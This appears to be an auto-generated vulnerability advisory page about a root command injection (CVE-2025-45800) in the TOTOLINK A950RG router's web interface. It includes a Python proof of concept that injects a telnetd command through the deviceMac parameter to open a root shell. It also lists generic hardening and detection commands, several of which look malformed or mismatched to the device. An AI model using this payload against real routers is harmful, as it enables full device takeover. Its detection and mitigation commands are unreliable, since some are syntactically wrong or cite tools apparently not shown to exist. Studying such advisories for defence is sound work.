TOTOLINK A950RG, Command Execution Vulnerability, CVE-2025-45800 (Critical)

Listen to this Post

How CVE-2025-45800 Works:

The vulnerability exists in the `setDeviceName` interface of `/lib/cste_modules/global.so` library in TOTOLINK A950RG firmware v4.1.2cu.5204_B20210112. When processing the `deviceMac` parameter, the function fails to properly sanitize user-supplied input before passing it to a system command execution function. This allows authenticated attackers to inject arbitrary commands through crafted requests to the web management interface. The commands execute with root privileges due to the service running as privileged user, enabling complete device compromise.

DailyCVE Form:

Platform: TOTOLINK A950RG
Version: 4.1.2cu.5204
Vulnerability: Command Injection
Severity: Critical
Date: 2025-05-02

Prediction: Patch by 2025-08-15

What Undercode Say:

Exploit POC (for educational purposes):
import requests
target = "http://192.168.1.1"
payload = ";telnetd -p 2323 -l/bin/sh;"
data = {"deviceMac": payload}
requests.post(target+"/setDeviceName", data=data)
Detection Command:
strings /lib/cste_modules/global.so | grep -i "system|popen"
Mitigation (temporary):
iptables -A INPUT -p tcp --dport 80 -s !192.168.1.100 -j DROP
chmod 750 /lib/cste_modules/global.so
Firmware Analysis:
binwalk -Me firmware.bin
grep -r "deviceMac" ./unpacked_firmware/
Patch Verification:
sha256sum /lib/cste_modules/global.so | awk '{print $1}'
Compare with known-good hash
Network Monitoring:
tcpdump -i eth0 'port 80 and host 192.168.1.1' -w traffic.pcap
Vulnerability Scanner:
nmap -sV --script=http-vuln-cve2025-45800 <target>
Memory Protection:
echo 2 > /proc/sys/kernel/randomize_va_space
sysctl -w kernel.exec-shield=1
Log Monitoring:
tail -f /var/log/messages | grep -i "global.so"
grep -r "setDeviceName" /var/log/
Emergency Response:
killall -9 httpd
mount -o remount,ro /

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top